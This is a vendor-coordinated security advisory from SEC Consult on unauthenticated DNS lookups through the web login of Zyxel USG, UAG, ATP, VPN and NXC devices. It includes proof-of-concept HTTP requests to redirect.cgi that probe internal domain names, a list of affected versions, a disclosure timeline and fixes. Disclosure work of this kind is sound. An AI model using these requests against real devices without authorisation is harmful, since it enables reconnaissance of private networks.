External DNS Requests in Zyxel USG/UAG/ATP/VPN/NXC series

Project Description

Multiple Zyxel devices from USG, UAG, ATP, VPN and NXC series are prone to sending unauthenticated DNS requests. Therefore, unauthenticated users can fetch whether a domain is present or not via the web login interface. When a host with the corresponding domain is present, the IP-address is embedded in the response.


Vendor description

“Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world’s first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users.

We’re building the networks of tomorrow, helping unlock the world’s potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally.

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml

 

Business recommendation

SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be installed immediatelyperformed by security professionals to identify further potential security issues.

 

Vulnerability overview/description

1) Information Disclosure via Unauthenticated External DNS Requests

A DNS request can be made by an unauthenticated attacker to either spam a DNS service of a third party with requests that have a spoofed origin or probe whether domain names are present on the internal network behind the firewall.

Proof of concept

1) Information Disclosure via Unauthenticated External DNS Requests

By sending the following POST request an attacker can probe for the domain
subdomain.domain.com:

POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1 
Host: 192.168.1.1 
Accept-Encoding: gzip, deflate 
Accept: */* 
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 
Connection: close 
Cache-Control: max-age=0 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 16 
 
arip=subdomain.domain.com

The following GET request can be used for the same purpose:

GET /redirect.cgi?arip=subdomain.domain.com&original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1 
Host: 192.168.1.1 
Accept-Encoding: gzip, deflate 
Accept: */* 
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 
Connection: close 
Cache-Control: max-age=0 

If the domain can be resolved, the response contains the resolved IP address within the cookie value:

HTTP/1.1 200 OK 
Date: Mon, 24 Jun 2019 08:14:33 GMT 
Cache-Control: no-cache, private 
Pragma: no-cache 
Expires: Mon, 16 Apr 1973 13:10:00 GMT 
Set-Cookie: arip=; path=/ 
Set-Cookie: zy_pc_browser=1; path=/ 
Connection: close 
Content-Type: text/html 
Content-Length: 9099

[...]

If the domain cannot be resolved, a redirection will be returned:

HTTP/1.1 302 Found 
Date: Mon, 24 Jun 2019 08:11:57 GMT 
Location: ext-js/app/view/login/useraware.html 
Content-Length: 220 
Connection: close 
Content-Type: text/html; charset=iso-8859-1

[...]

Vulnerable / tested versions:

The following versions have been tested, other versions might be affected as well:

  • Zyxel USG110 ZLD 4.33
  • Zyxel USG210 ZLD 4.33
  • Zyxel USG310 ZLD 4.33
  • Zyxel USG1100 ZLD 4.33
  • Zyxel USG1900 ZLD 4.33
  • Zyxel USG2200-VPN ZLD 4.33
  • Zyxel UAG2100 ZLD 4.18
  • Zyxel UAG4100 ZLD 4.18

The vendor provided the following list of affected devices:

  • Zyxel ATP200 ZLD4.33 patch 1 and earlier
  • Zyxel ATP500 ZLD4.33 patch 1 and earlier
  • Zyxel ATP800 ZLD4.33 patch 1 and earlier
  • Zyxel UAG2100 4.18 patch 1 and earlier
  • Zyxel UAG4100 4.18 patch 1 and earlier
  • Zyxel VPN50 SD-OS 10.02 and earlier
  • Zyxel VPN100 SD-OS 10.02 and earlier
  • Zyxel VPN300 SD-OS 10.02 and earlier
  • Zyxel USG20-VPN ZLD4.33 and earlier
  • Zyxel USG20W-VPN ZLD4.33 and earlier
  • Zyxel USG40 ZLD4.33 and earlier
  • Zyxel USG40W ZLD4.33 and earlier
  • Zyxel USG60 ZLD4.33 and earlier
  • Zyxel USG60W ZLD4.33 and earlier
  • Zyxel USG110 ZLD4.33 and earlier
  • Zyxel USG210 ZLD4.33 and earlier
  • Zyxel USG310 ZLD4.33 and earlier
  • Zyxel USG1100 ZLD4.33 and earlier
  • Zyxel USG1900 ZLD4.33 and earlier
  • Zyxel USG2200 ZLD4.33 and earlier
  • Zyxel NXC2500 5.40 and earlier
  • Zyxel NXC5500 5.40 and earlier

 

Vendor contact timeline

2019-06-26Contacting vendor through security@zyxel.com.tw.
2019-06-27Vendor changed PGP key. Sent advisory with new key. Vendor confirmed receipt.
2019-07-03Asked for an update; Vendor told that they just finished their investigation.
2019-07-09Vendor provided a full list of devices that are prone to this vulnerability.
2019-07-23Asked for a timeline; Vendor asked to shift the release of the advisory to 2019-08-29 in order to provide fixes; Shifted advisory release to this date.
2019-08-26Asked for a status update; Vendor told that fixes are ready to be published at 2019-08-29.
2019-08-29Coordinated advisory release.

Solution

Install the newest firmware for your device from the vendor’s website to fix this issue:

https://www.zyxel.com/support/download_landing.shtml

Additionally, the vendor provides the following security notice: https://www.zyxel.com/support/web-CGI-vulnerability-of-gateways-and-access-point-controllers.shtml

Workaround

Restrict network access to the web interface.

 

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

EOF Thomas Weber / @2019

 

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult?
Contact our local offices.

Project Details

  • TitleExternal DNS Requests
  • ProductZyxel USG/UAG/ATP/VPN/NXC series
  • Vulnerable versionsee "Vulnerable / tested version"
  • Fixed versionsee "Solution"
  • CVE number-
  • Impactmedium
  • Homepagehttps://www.zyxel.com
  • Found2019-06-19
  • ByThomas Weber (Office Vienna) | SEC Consult Vulnerability Lab

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Help

To continue, you must make a cookie selection. Below is an explanation of the different options and their meaning.

  • Accept all cookies:
    All cookies such as tracking and analytics cookies.
  • Accept first-party cookies only:
    Only cookies from this website.
  • Reject all tracking cookies:
    No cookies except for those necessary for technical reasons are set.

You can change your cookie setting here anytime: Blog. Blog

Back